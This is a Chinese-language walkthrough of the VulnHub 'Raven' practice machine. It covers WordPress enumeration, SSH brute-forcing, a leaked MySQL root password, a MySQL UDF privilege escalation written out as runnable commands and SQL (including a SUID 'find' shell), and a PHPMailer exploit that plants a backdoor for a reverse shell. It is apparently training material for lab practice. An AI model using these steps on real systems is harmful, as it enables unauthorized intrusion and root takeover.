raven靶机

仅供个人娱乐

靶机信息

Raven 下载地址：https://www.vulnhub.com/entry/raven-1,256/

一、主机探测

端口信息

目录扫描

80端口

根据页面开始搜寻有用的信息

得到信息

Wpscan漏洞利用

右上角BLOG ，会发现是 WordPress 系统。于是使用 WPScan 进行扫描

wpscan --url http://192.168.204.131/wordpress/  -ep -et -eu

-ep  枚举插件信息

-et  扫描主题

-eu  枚举用户

结果的到wordpress目录 用户等   用户有steven 和michael

发现靶机上的两个用户名：steven 和michael

使用ssh爆破  密码使用rockyou.txt

（重置虚拟机 ip改为 192.168.204.131）

将文件复制到root目录  并且解压

使用弱口令michael/michael 尝试登陆ssh

查看是否能用sudo提权,内核提权等等

一步一步    寻找有用信息

查看wp-config.php,发现mysql用户名以及密码 root/R@v3nSecurity

netstat -anpt
查看开放的端口,发现开放3306

进入数据库

root/R@v3nSecurity

信息收集

cmd5 破解

ssh登录

使用sudo python -c ‘import pty;pty.spawn("/bin/bash")’ 绕过限制，获得管理员权限

mysql udf 提权

ps -ef | grep mysql

ps -ef是以全格式显示当前所有的进程

grep 命令用于查找文件里符合条件的字符串

查看mysql udf漏洞的利用exp

进入kali apache的根目录

将文件复制到html目录

进行编译

gcc -g -c 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so

靶机切换tmp目录
靶机wget下载       kali编译生成的1518.so

连接数据库

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select*fromfoo into dumpfile'/usr/lib/mysql/plugin/1518.so';

create function do_system returns integer soname'1518.so';

select*from mysql.func;

selectdo_system('chmod u+s /usr/bin/find');

exit

touch finn

find finn -exec"/bin/sh" \;

whoami

获得权限成功

打开http://192.168.204.131/vendor/

根据网页查找有用信息

searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本

复制到 /root

修改文件

（个人电脑问题，kali安装pip3，pip3 install requests-toolbelt）

脚本更名为 1.py   将脚本放置于/root

cd  /root
python3 1.py

访问http://192.168.204.131/contact.php

此时就会生成后门文件backlion.php

接着访问后门文件：http://192.168.204.131/backlion.php

进行监听 获取shell